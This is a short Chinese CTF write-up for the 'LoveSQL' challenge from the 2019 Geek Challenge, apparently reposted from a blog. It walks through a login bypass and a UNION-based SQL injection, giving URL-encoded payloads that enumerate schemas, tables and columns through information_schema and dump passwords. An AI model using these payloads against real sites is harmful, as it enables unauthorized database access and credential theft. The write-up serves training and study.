首页 > 数据库技术 > 详细

[极客大挑战 2019]LoveSQL

时间:2020-01-27 20:56:31      阅读:341      评论:0      收藏:0      [点我收藏+]

0x00 知识点

1:万能密码登陆
2:登陆后直接使用联合查询注入

0x01解题

登陆后进行简单测试发现是字符型注入
order by 测试数据库有多少字段
技术分享图片

发现在4的时候报错,没有过滤,直接进行注入
注入数据库:

admin'union+select+1,2,group_concat(schema_name)+from+information_schema.schemata#

查询数据表

username=admin&password=admin‘%20union%20select%201%2C2%2Cgroup_concat(table_name)%20from%20information_schema.tables%20where%20table_schema%3Ddatabase()%20%23技术分享图片

查询数据表中的列:

username=admin&password=admin%27%20union%20select%201%2C2%2Cgroup_concat(column_name)%20from%20information_schema.columns%20where%20table_schema%3Ddatabase()%20%23技术分享图片

查询数据

username=admin&password=admin‘%20union%20select%201%2C2%2Cgroup_concat(password)%20from%20l0ve1ysq1%23技术分享图片

查看源代码得到flag.

[极客大挑战 2019]LoveSQL

原文:https://www.cnblogs.com/wangtanzhi/p/12236768.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!